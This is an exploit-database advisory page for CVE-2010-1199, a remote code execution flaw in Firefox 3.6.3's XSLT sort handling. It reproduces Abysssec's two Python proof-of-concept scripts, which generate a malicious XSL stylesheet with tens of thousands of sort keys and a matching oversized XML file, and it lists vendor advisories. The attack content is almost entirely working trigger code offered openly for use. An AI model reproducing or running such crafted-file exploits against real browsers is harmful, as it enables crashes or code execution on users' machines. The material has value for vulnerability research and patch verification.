Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability

2010.09.13
Credit: Abysssec
Risk: High
Local: No
Remote: Yes
CVE: CVE-2010-1199
CWE: CWE-189


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < Day 9 (Binary Analysis) | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-9-mozilla-firefox-xslt-sort-remote-code-execution-vulnerability/ http://www.exploit-db.com/sploits/moaub-day9-ba.zip ''' ''' Title : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability Version : Firefox 3.6.3 Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : High/Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1199 ''' import sys; myStyle = """<?xml version="1.0"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:output method="html"/> <xsl:template match="/"> <html> <head> <title>Beatles</title> </head> <body> <table border="1"> <xsl:for-each select="beatles/beatle"> """ BlockCount = 43000 count = 1 while(count<BlockCount): myStyle = myStyle + "<xsl:sort select='name/abysssec"+str(count)+"' order='descending'/>\n" count = count + 1 myStyle = myStyle +""" <tr> <td><a href="{@link}"><xsl:value-of select="name/lastname"/></a></td> <td><a href="{@link}"><xsl:value-of select="name/firstname"/></a></td> </tr> </xsl:for-each> </table> </body> </html> </xsl:template> </xsl:stylesheet> """ cssFile = open("abysssec.xsl","w") cssFile.write(myStyle) cssFile.close() ''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ ''' ''' Title : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability Version : Firefox 3.6.3 Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : High/Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1199 MOAUB Number : MOAU_09_BA ''' import sys; myStyle = """<?xml version="1.0"?> <?xml-stylesheet href="abysssec.xsl" type="text/xsl"?> <beatles> """ block = """ <beatle link="http://www.johnlennon.com"> <name> """ BlockCount = 2147483647 rowCount=10 #myStyle = myStyle + "<tree id='mytree' flex='1' rows='"+str(rowCount)+"'>\n" count = 1 while(count<BlockCount): myStyle = myStyle + """ <beatle link="http://www.johnlennon.com"> <name> """ myStyle = myStyle + " <firstname>"+"A"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>Lennon</lastname> </name> </beatle> <beatle link="http://www.paulmccartney.com"> <name>""" myStyle = myStyle + " <firstname>"+"B"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>McCartney</lastname> </name> </beatle> <beatle link="http://www.georgeharrison.com"> <name> """ myStyle = myStyle + " <firstname>"+"C"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>Harrison</lastname> </name> </beatle> <beatle link="http://www.ringostarr.com"> <name> """ myStyle = myStyle + " <firstname>"+"D"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>Starr</lastname> </name> </beatle> <beatle link="http://www.webucator.com" real="no"> <name> """ myStyle = myStyle + " <firstname>"+"E"*rowCount+"</firstname>\n" myStyle = myStyle +""" <lastname>Dunn</lastname> </name> </beatle> """ count = count - 1 myStyle = myStyle +""" </beatles> """ cssFile = open("abyssssec.xml","w") cssFile.write(myStyle) cssFile.close()

References:

https://bugzilla.mozilla.org/show_bug.cgi?id=554255
http://xforce.iss.net/xforce/xfdb/59666
http://www.vupen.com/english/advisories/2010/1773
http://www.vupen.com/english/advisories/2010/1640
http://www.vupen.com/english/advisories/2010/1557
http://www.vupen.com/english/advisories/2010/1556
http://www.vupen.com/english/advisories/2010/1551
http://www.ubuntu.com/usn/usn-930-2
http://www.securitytracker.com/id?1024139
http://www.securitytracker.com/id?1024138
http://www.securityfocus.com/bid/41050
http://www.redhat.com/support/errata/RHSA-2010-0501.html
http://www.redhat.com/support/errata/RHSA-2010-0500.html
http://www.redhat.com/support/errata/RHSA-2010-0499.html
http://www.mozilla.org/security/announce/2010/mfsa2010-30.html
http://www.mandriva.com/security/advisories?name=MDVSA-2010:125
http://ubuntu.com/usn/usn-930-1
http://support.avaya.com/css/P8/documents/100091069
http://secunia.com/advisories/40481
http://secunia.com/advisories/40401
http://secunia.com/advisories/40326
http://secunia.com/advisories/40323
http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:10885
http://lists.opensuse.org/opensuse-security-announce/2010-07/msg00005.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top